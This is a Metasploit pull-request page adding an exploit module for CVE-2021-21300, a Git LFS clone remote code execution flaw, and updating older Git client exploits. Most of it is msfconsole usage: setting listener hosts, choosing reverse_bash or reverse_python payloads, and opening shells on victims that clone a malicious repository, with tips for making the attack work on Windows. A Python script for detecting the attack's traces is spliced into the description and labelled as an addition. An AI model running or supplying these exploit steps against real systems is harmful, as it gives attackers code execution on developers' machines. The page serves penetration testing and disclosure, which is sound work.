
Add module for CVE-2021-21300 and Git mixins #15532

Merged (18 commits) Aug 26, 2021

Conversation

@space-r7 (Contributor) commented Aug 9, 2021

Description

This adds an exploit module for CVE-2021-21300 and a set of mixins that aid in exploiting Git clients over the Smart HTTP protocol. This also updates older Git-related exploits to use some of the new code.

Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems are
vulnerable to remote code execution while cloning a repository.

Usage of clean / smudge filters through Git LFS and a case-insensitive file system changes the checkout order
of repository files which enables the placement of a Git hook in the .git/hooks directory. By default, this module writes
a post-checkout script so that the payload will automatically be executed upon checkout of the repository.

Verification

  • Install a vulnerable Git and Git LFS client (instructions in docs)
  • Start msfconsole
  • Do: use exploit/multi/http/git_lfs_clone_command_exec
  • Do: run
  • On the target do: git clone <git_repo>
  • You should get a shell.

Scenarios

CVE-2021-21300

Git 2.30.1 for Windows

msf6 > use exploit/multi/http/git_lfs_clone_command_exec 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set srvhost 192.168.140.1
srvhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.140.1:4444 
msf6 exploit(multi/http/git_lfs_clone_command_exec) > [*] Using URL: http://192.168.140.1:8080/PRcDc6VIFG
[*] Server started.
[*] Git repository to clone: http://192.168.140.1:8080/solarbreeze.git
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted okloyzhacjw
[+] Deleted .git
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.132:50009) at 2021-08-09 12:19:35 -0500

msf6 exploit(multi/http/git_lfs_clone_command_exec) > sessions -i -1
[*] Starting interaction with 1...

whoami
Shelby Pace
uname -a
MINGW64_NT-10.0-14393 DESKTOP-66PT795 3.1.7-340.x86_64 2020-10-23 13:08 UTC x86_64 Msys

Git 2.20.1 for MacOS

msf6 > use exploit/multi/http/git_lfs_clone_command_exec 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set srvhost 192.168.140.1
srvhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/git_lfs_clone_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.140.1:4444 
msf6 exploit(multi/http/git_lfs_clone_command_exec) >
[*] Using URL: http://192.168.140.1:8080/epWdIcZgUp94
[*] Server started.
[*] Git repository to clone: http://192.168.140.1:8080/konklux.git
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted jqeymnnhoce
[+] Deleted .git
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.131:49401) at 2021-08-09 15:20:22 -0500

msf6 exploit(multi/http/git_lfs_clone_command_exec) > sessions -i -1
[*] Starting interaction with 1...

whoami
space
uname -a
Darwin spaces-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Tue Aug 20 16:57:14 PDT 2019; root:xnu-4903.271.2~2/RELEASE_X86_64 x86_64

Updated Modules

  • modules/exploits/multi/http/git_client_command_exec.rb -> 2.2.0
msf6 > use exploit/multi/http/git_client_command_exec
msf6 exploit(multi/http/git_client_command_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(multi/http/git_client_command_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/git_client_command_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/git_client_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_client_command_exec) > 
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Using URL: http://192.168.37.1:8080/gJnoE43VE1
[*] Server started.
[*] Malicious Git URI is http://192.168.37.1:8080/rtfy.git
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.144:49255) at 2021-07-14 16:45:54 -0500

msf6 exploit(multi/http/git_client_command_exec) > sessions -i -1
[*] Starting interaction with 1...

uname -a
MINGW32_NT-6.1 WIN-SDFTIF89MIT 1.0.12(0.46/3/2) 2012-07-05 14:56 i686 unknown
  • modules/exploits/multi/http/git_submodule_command_exec.rb -> 2.7.5
msf6 > use exploit/multi/http/git_submodule_command_exec 
[*] Using configured payload cmd/unix/reverse_python
msf6 exploit(multi/http/git_submodule_command_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_command_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_command_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_submodule_command_exec) > 
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Using URL: http://192.168.37.1:8080/dAzYrZl005vEI
[*] Server started.
[*] Malicious Git URI is http://192.168.37.1:8080/kujfxjoub.git
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:59662) at 2021-07-14 15:03:36 -0500

msf6 exploit(multi/http/git_submodule_command_exec) > sessions -i -1
[*] Starting interaction with 1...

uname -a
Linux ubuntu 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
space
  • modules/exploits/multi/http/git_submodule_url_exec.rb -> 2.19.0
msf6 exploit(multi/http/git_submodule_url_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_submodule_url_exec) > 
[*] Started reverse TCP handler on 192.168.37.75:4444 
[*] Using URL: http://192.168.37.75:8080/5LUNukwTqTJ7sed
[*] Server started.
[*] Malicious Git URI is http://192.168.37.75:8080/xgyuj.git
[*] git clone --recurse-submodules http://192.168.37.75:8080/xgyuj.git
Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/git_submodule_url_exec) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_url_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/git_submodule_url_exec) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.37.1:4444 
msf6 exploit(multi/http/git_submodule_url_exec) >
[*] Using URL: http://192.168.37.1:8080/mJBVOrk8nCFaptG
[*] Server started.
[*] Malicious Git URI is http://192.168.37.1:8080/aymxub.git
[*] git clone --recurse-submodules http://192.168.37.1:8080/aymxub.git
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.1:57423) at 2021-07-14 14:29:34 -0500

msf6 exploit(multi/http/git_submodule_url_exec) > sessions -i -1
[*] Starting interaction with 2...

uname -a
Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
space
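The checkout-order trick described at the top of this PR leaves inspectable traces in the resulting clone: a symbolic link whose target resolves into .git, a second path that collides with it by case, and a .gitattributes entry that routes files through a clean/smudge filter. As an added defensive example (not part of this PR or of Metasploit), the following Python script checks a working tree for those three indicators before anyone runs git commands inside it. It uses only the standard library; the function names and the sample tree it builds are constructed here, and the sample needs a case-sensitive file system so that both colliding names can exist side by side.

```python
# Added defensive example (not from the PR): inspect a cloned working tree for the
# indicators the PR describes: a symlink resolving into .git, case-colliding paths,
# and .gitattributes entries that route files through a clean/smudge filter.
import os
import sys
import tempfile
from pathlib import Path


def tracked_paths(repo: Path) -> list:
    """Relative paths of every entry in the working tree, excluding .git itself.
    Stand-in for `git ls-tree -r --name-only HEAD` so the script needs no git binary."""
    out = []
    for root, dirs, files in os.walk(repo):  # followlinks=False: symlinked dirs are listed, not entered
        dirs[:] = [d for d in dirs if d != ".git"]
        for name in dirs + files:
            out.append(str((Path(root) / name).relative_to(repo)))
    return out


def find_symlinks_into_git(repo: Path) -> list:
    """Relative paths of symlinks whose target resolves to .git or anything beneath it."""
    git_dir = (repo / ".git").resolve()
    hits = []
    for rel in tracked_paths(repo):
        p = repo / rel
        if p.is_symlink():
            # Relative link targets are interpreted from the link's own directory.
            target = (p.parent / os.readlink(p)).resolve()
            if target == git_dir or git_dir in target.parents:
                hits.append(rel)
    return sorted(hits)


def case_collisions(paths) -> list:
    """Groups of distinct paths that compare equal case-insensitively. On a
    case-insensitive file system only one member of each group can be checked out."""
    groups = {}
    for p in paths:
        groups.setdefault(p.lower(), []).append(p)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


def parse_filter_attributes(text: str) -> list:
    """(pattern, filter name) pairs from .gitattributes content, e.g. ('*.bin', 'lfs')."""
    pairs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        pattern, *attrs = line.split()
        for attr in attrs:
            if attr.startswith("filter="):
                pairs.append((pattern, attr[len("filter="):]))
    return pairs


def inspect_clone(repo) -> dict:
    """Run all three checks against a working tree and return the findings."""
    repo = Path(repo).resolve()
    attrs = repo / ".gitattributes"
    return {
        "symlinks_into_git": find_symlinks_into_git(repo),
        "case_collisions": case_collisions(tracked_paths(repo)),
        "filters": parse_filter_attributes(attrs.read_text()) if attrs.is_file() else [],
    }


def build_sample_clone() -> Path:
    """Constructed sample with the shape the PR describes (needs a case-sensitive FS):
    a symlink into .git/hooks, a same-named directory differing only by case, and an
    LFS filter attribute. The hook file is a harmless placeholder."""
    repo = Path(tempfile.mkdtemp(prefix="clone-check-"))
    (repo / ".git" / "hooks").mkdir(parents=True)
    (repo / ".gitattributes").write_text("*.bin filter=lfs diff=lfs merge=lfs -text\n")
    os.symlink(".git/hooks", repo / "link")
    (repo / "LINK").mkdir()
    (repo / "LINK" / "post-checkout").write_text("#!/bin/sh\necho constructed placeholder\n")
    return repo


if __name__ == "__main__":
    # Usage: python clone_check.py /path/to/clone   (no argument: inspect the constructed sample)
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_clone()
    for key, value in inspect_clone(target).items():
        print(f"{key}: {value}")
```

Any non-empty finding in the first two categories is a strong signal: a legitimate repository has no reason to link into its own .git directory, and case collisions are at best a portability bug. A filter entry on its own is normal for LFS repositories, so it only raises the weight of the other two findings. Running the check from a case-sensitive host (or from `git ls-tree` output) is what makes the collision check reliable, since a case-insensitive checkout has already collapsed the colliding names.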

@gwillcox-r7 (Contributor) commented:

@msjenkins-r7 test this please

@wvu (Contributor) commented Aug 10, 2021

Really nice work, @space-r7!

@wvu wvu added the library label Aug 10, 2021
@gwillcox-r7 gwillcox-r7 removed their assignment Aug 11, 2021
@timwr (Contributor) commented Aug 25, 2021

This is working for me on macOS:

user@Catalina-10154 gittest % git --version
git version 2.24.3 (Apple Git-128)
user@Catalina-10154 gittest % git clone http://192.168.13.37:8080/latlux.git
Cloning into 'latlux'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.
warning: the following paths have collided (e.g. case-sensitive paths
on a case-insensitive filesystem) and only one from the same
colliding group is in the working tree:

  'cxiwzjzrlo'
  'CXIWZJZRLO/post-checkout'
/Users/user/gittest/latlux/.git/hooks/post-checkout: line 2: 95: Bad file descriptor
(...session 1 opened)
^Cwarning: Clone succeeded, but checkout failed.
You can inspect what was checked out with 'git status'
and retry with 'git restore --source=HEAD :/'



Exiting because of "interrupt" signal.
user@Catalina-10154 gittest %

but I can't seem to get it to work on Windows 10 (https://github.com/git-for-windows/git/releases/tag/v2.29.0.windows.1):

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ export MSYS=winsymlinks:nativestrict

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ git clone http://192.168.13.37:8080/latlux.git
Cloning into 'latlux'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), 705 bytes | 13.00 KiB/s, done.
error: unable to create file CXIWZJZRLO/post-checkout: No such file or directory
warning: the following paths have collided (e.g. case-sensitive paths
on a case-insensitive filesystem) and only one from the same
colliding group is in the working tree:

  'cxiwzjzrlo'
fatal: unable to checkout working tree
warning: Clone succeeded, but checkout failed.
You can inspect what was checked out with 'git status'
and retry with 'git restore --source=HEAD :/'


User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ git --version
git version 2.29.0.windows.1

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ cat latlux/
.git/           .gitattributes  cxiwzjzrlo

User@DESKTOP-5E3GRS6 MINGW64 ~/test
$ cat latlux/cxiwzjzrlo
.git/hooks

I ensured Git LFS and symbolic links were enabled during installation. Any ideas?

@space-r7 (Contributor, Author) commented:

> but I can't seem to get it to work on Windows 10 (https://github.com/git-for-windows/git/releases/tag/v2.29.0.windows.1):
>
> I ensured Git LFS and symbolic links were enabled during installation. Any ideas?

Are you running Git Bash as an administrator? Symbolic links on Windows require the SeCreateSymbolicLinkPrivilege privilege as well, so you can either enable that for the user account or run Git Bash as an administrator.

@timwr (Contributor) commented Aug 26, 2021

Ah that was it, thanks!
The code looks great so I'll go ahead and land this once I've validated the older modules shortly.
Nice work!

@space-r7 (Contributor, Author) commented:

Thanks so much!

@timwr (Contributor) commented Aug 26, 2021

Confirmed exploit/multi/http/git_lfs_clone_command_exec against:

  • git version 2.24.3 (Apple Git-128) on macOS
  • git version 2.29.0.windows.1 on Windows 10

Confirmed exploit/multi/http/git_submodule_command_exec with:

  • git version 2.7.1 on macOS

Confirmed exploit/multi/http/git_submodule_url_exec with:

  • git version 2.19.0 on macOS

@timwr timwr merged commit 6c0b90e into rapid7:master Aug 26, 2021
@timwr (Contributor) commented Aug 26, 2021

git version 2.29.0.windows.1 on Windows 10:

msf6 > use exploit/multi/http/git_lfs_clone_command_exec
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/git_lfs_clone_command_exec) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(multi/http/git_lfs_clone_command_exec) > rexploit
[*] Reloading module...
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/git_lfs_clone_command_exec) >
[*] Started reverse TCP handler on 192.168.13.37:4444
[*] Using URL: http://0.0.0.0:8080/Fh2J2uA4cPX
[*] Local IP: http://192.168.13.37:8080/Fh2J2uA4cPX
[*] Server started.
[*] Git repository to clone: http://192.168.13.37:8080/sonair.git


Jobs
====

  Id  Name                                            Payload                Payload opts
  --  ----                                            -------                ------------
  0   Exploit: multi/http/git_lfs_clone_command_exec  cmd/unix/reverse_bash  tcp://192.168.13.37:4444

msf6 exploit(multi/http/git_lfs_clone_command_exec) >
[*] Sending payload data...
[*] Sending LFS object...
[+] Deleted .gitattributes
[+] Deleted ezlocylph
[+] Deleted .git
[*] Command shell session 1 opened (192.168.13.37:4444 -> 192.168.13.37:43798) at 2021-08-26 18:27:03 +0100

msf6 exploit(multi/http/git_lfs_clone_command_exec) > sessions 1
[*] Starting interaction with 1...

pwd
/c/Users/User/test/sonair
id
uid=197609(User) gid=197121 groups=197121
uname
MINGW64_NT-10.0-19042

@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 26, 2021
@gwillcox-r7 (Contributor) commented:

Release Notes

An exploit module for CVE-2021-21300, an RCE vulnerability in affected Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems. Additionally, a set of mixins that aid in exploiting Git clients over the Smart HTTP protocol has been added to Metasploit, and the code for older Git-related exploits has been updated to use some of this new code.
